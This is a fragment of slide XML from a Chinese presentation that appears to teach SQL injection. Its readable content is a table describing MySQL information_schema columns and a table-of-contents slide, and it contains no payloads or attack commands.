                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1521286753"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="781217">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Table_schema</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>表所在的数据库名</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4092925779"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="519335">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1"/>
                        <a:t>Information_schema.columns</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                        <a:t>列的信息</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Column_name</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>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100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>当前用户的数据库中的所有列的列名</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2190037740"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="519335">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Table_name</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>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100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>列所在数据库的库名</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1508604922"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="519335">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Table_schema</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>列所在表的表名</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="105470" marR="105470" marT="52735" marB="52735"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3390782856"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284846770"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="354858"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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pc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE628061-5806-4030-8227-2889B91B4AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1356026" y="1299001"/>
            <a:ext cx="1946715" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>目 录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="组合 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4FCB05-1A3A-4114-B6AC-4ED35B19F57A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2191592" y="2427446"/>
            <a:ext cx="3431213" cy="539178"/>
            <a:chOff x="3896674" y="1968528"/>
            <a:chExt cx="3431213" cy="539178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A379127-CC6F-4EBD-901D-7B6529B7755A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3896674" y="1968528"/>
              <a:ext cx="838868" cy="539178"/>
              <a:chOff x="3896674" y="1968528"/>
              <a:chExt cx="838868" cy="539178"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="椭圆 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3367C80-D7BA-475C-950C-0630F64D6ECE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3896674" y="1968528"/>
                <a:ext cx="539178" cy="539178"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="20000">
                    <a:srgbClr val="475574">
                      <a:alpha val="76000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="77000">
                    <a:srgbClr val="F2D4AA">
                      <a:alpha val="66000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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pc="600">
                  <a:solidFill>
                    <a:srgbClr val="034581"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="文本框 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAACBA76-2F78-40CB-9BDE-AFD98A10790B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3906020" y="2038062"/>
                <a:ext cx="829522" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>01.</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="矩形 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E73D5FB9-8A88-4FEF-91A2-45D1F66CCFF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4451779" y="2046041"/>
              <a:ext cx="2876108" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>注入</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>—</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>sql</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="组合 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A29D7157-06DD-4FC8-A894-A30163D6D291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2191592" y="3474680"/>
            <a:ext cx="3510881" cy="539178"/>
            <a:chOff x="4947367" y="2731139"/>
            <a:chExt cx="3510881" cy="539178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="组合 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0304F49-08E0-47D3-BEEB-D3A5A1FEB66C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4947367" y="2731139"/>
              <a:ext cx="838868" cy="539178"/>
              <a:chOff x="3896674" y="1968528"/>
              <a:chExt cx="838868" cy="539178"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="椭圆 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D5D3AF-BA41-41EB-AF74-7674B9FBB6C5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3896674" y="1968528"/>
                <a:ext cx="539178" cy="539178"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="20000">
                    <a:srgbClr val="475574">
                      <a:alpha val="76000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="77000">
                    <a:srgbClr val="F2D4AA">
                      <a:alpha val="66000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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pc="600">
                  <a:solidFill>
                    <a:srgbClr val="034581"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="文本框 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57B30D7-7264-4F18-A19F-1855CF8956DB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3906020" y="2038062"/>
                <a:ext cx="829522" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>02.</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEC84628-F54B-4722-8AA1-EC15458F45C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5487563" y="2754039"/>
              <a:ext cx="2970685" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>注入</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0">
